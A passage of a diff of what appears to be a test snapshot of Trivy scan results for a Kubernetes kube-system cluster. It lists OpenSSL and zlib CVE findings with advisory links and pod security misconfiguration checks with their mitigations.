"https://errata.rockylinux.org/RLSA-2022:4899", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", + "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", + "https://linux.oracle.com/cve/CVE-2022-0778.html", + "https://linux.oracle.com/errata/ELSA-2022-9272.html", + "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", + "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220321-0002/", + "https://security.netapp.com/advisory/ntap-20220429-0005/", "https://support.apple.com/kb/HT213255", "https://support.apple.com/kb/HT213256", "https://support.apple.com/kb/HT213257", - "https://ubuntu.com/security/notices/USN-5355-1", - "https://ubuntu.com/security/notices/USN-5355-2", - "https://ubuntu.com/security/notices/USN-5359-1", - "https://ubuntu.com/security/notices/USN-5359-2", - "https://ubuntu.com/security/notices/USN-5739-1", - "https://www.cve.org/CVERecord?id=CVE-2018-25032", - "https://www.debian.org/security/2022/dsa-5111", - "https://www.openwall.com/lists/oss-security/2022/03/24/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "https://ubuntu.com/security/notices/USN-5328-1", + "https://ubuntu.com/security/notices/USN-5328-2", + "https://www.cve.org/CVERecord?id=CVE-2022-0778", + "https://www.debian.org/security/2022/dsa-5103", + "https://www.openssl.org/news/secadv/20220315.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.tenable.com/security/tns-2022-06", + "https://www.tenable.com/security/tns-2022-07", + "https://www.tenable.com/security/tns-2022-08", + "https://www.tenable.com/security/tns-2022-09", ], }, "category": "Vulnerability", - "description": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "A flaw found in zlib when compressing (not decompressing) certain inputs", + "name": "openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-25032", + "value": "https://avd.aquasec.com/nvd/cve-2022-0778", + }, + { + "type": "URL", + "value": "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", }, { "type": "URL", @@ -86302,4543 +87391,4233 @@ commonly used by applications.", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/25/2", + "value": "https://access.redhat.com/errata/RHSA-2022:5326", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/26/1", + "value": "https://access.redhat.com/security/cve/CVE-2022-0778", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8420", + "value": "https://bugzilla.redhat.com/2062202", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-25032", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2067945", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", + "value": "https://errata.almalinux.org/8/ALSA-2022-5326.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", + "value": "https://errata.rockylinux.org/RLSA-2022:4899", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8420.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", }, { "type": "URL", - "value": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", }, { "type": "URL", - "value": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", }, { "type": "URL", - "value": "https://github.com/madler/zlib/issues/605", + "value": "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", }, { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", + "value": "https://linux.oracle.com/cve/CVE-2022-0778.html", }, { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", + "value": "https://linux.oracle.com/errata/ELSA-2022-9272.html", }, { "type": "URL", - "value": "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", + "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2018-25032.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9565.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + "value": "https://security.netapp.com/advisory/ntap-20220321-0002/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + "value": "https://security.netapp.com/advisory/ntap-20220429-0005/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + "value": "https://support.apple.com/kb/HT213255", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + "value": "https://support.apple.com/kb/HT213256", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-42", + "value": "https://support.apple.com/kb/HT213257", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220526-0009/", + "value": "https://ubuntu.com/security/notices/USN-5328-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", + "value": "https://ubuntu.com/security/notices/USN-5328-2", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213255", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0778", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213256", + "value": "https://www.debian.org/security/2022/dsa-5103", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213257", + "value": "https://www.openssl.org/news/secadv/20220315.txt", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-1", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-2", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-1", + "value": "https://www.tenable.com/security/tns-2022-06", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-2", + "value": "https://www.tenable.com/security/tns-2022-07", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5739-1", + "value": "https://www.tenable.com/security/tns-2022-08", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-25032", + "value": "https://www.tenable.com/security/tns-2022-09", + }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4450", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4450", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "https://linux.oracle.com/cve/CVE-2022-4450.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "https://www.openssl.org/news/secadv/20230207.txt", + ], + }, + "category": "Vulnerability", + "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "double free after calling PEM_read_bio_ex", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-4450", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5111", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/24/1", + "value": "https://access.redhat.com/security/cve/CVE-2022-4450", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/28/1", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://bugzilla.redhat.com/2164487", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", - ], - }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.allowPrivilegeEscalation' to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/2164494", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kube-proxy' of DaemonSet 'kube-proxy' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", - ], - }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(DaemonSet 'kube-proxy' should not set 'spec.template.spec.hostNetwork' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV015", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv015", - ], - }, - "category": "Misconfiguration", - "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].resources.requests.cpu'.", - "name": "CPU requests not specified(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.requests.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv015", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV017", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv017", - ], - }, - "category": "Misconfiguration", - "description": "Privileged containers share namespaces with the host system and do not offer any security. They should be used exclusively for system containers that require high privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Change 'containers[].securityContext.privileged' to 'false'.", - "name": "Privileged container(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.privileged' to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv017", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - 